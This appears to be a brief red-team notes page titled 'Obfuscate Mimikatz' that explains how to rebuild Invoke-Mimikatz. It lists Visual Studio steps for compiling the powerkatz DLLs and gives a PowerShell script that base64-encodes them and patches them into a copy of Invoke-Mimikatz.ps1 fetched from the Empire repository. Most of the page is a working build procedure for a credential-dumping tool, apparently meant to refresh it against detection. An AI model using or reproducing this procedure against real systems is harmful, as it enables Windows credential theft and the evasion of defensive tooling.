Mimikatz

Obfuscate Mimikatz

Invoke-Mimikatz

http://clymb3r.wordpress.com/2013/04/09/modifying-mimikatz-to-be-loaded-using-invoke-reflectivedllinjection-ps1/

Update .ps1

http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/

Update the Invoke-Mimikatz.ps1 PowerShell script:

Grab source code zip from the latest (or any one you want) release of Mimikatz.
Open the solution in Visual Studio.
Select the Second_Release_PowerShell target option and compile for Win32.
Right-click on mimikatz solution > Properties > C/C++ > Set Treat warnings as errors to No (/WX-) > OK.
Compile for x64.
Transform the resulting powerkatz DLLs to base64 and replace the $PEBytes32 and $PEBytes64 vars at the bottom of Invoke-Mimikatz.ps1 with a PowerShell script below.

Update-InvokeMimikatz.ps1

$powerkatz32 = [System.IO.File]::ReadAllBytes("Win32\powerkatz.dll")
$powerkatz64 = [System.IO.File]::ReadAllBytes("x64\powerkatz.dll")
$encPowerkatz32 = [System.Convert]::ToBase64String($powerkatz32)
$encPowerkatz64 = [System.Convert]::ToBase64String($powerkatz64)
$invokeMimikatz = (New-Object Net.WebClient).DownloadString("https://github.com/BC-SECURITY/Empire/raw/master/empire/server/data/module_source/credentials/Invoke-Mimikatz.ps1") -replace '\$PEBytes32 = .*$', ('$PEBytes32 = ' + "'$encPowerkatz32'")
$invokeMimikatz -replace '\$PEBytes64 = .*$', ('$PEBytes64 = ' + "'$encPowerkatz64'") > Invoke-Mimikatz.ps1

Last updated 8 months ago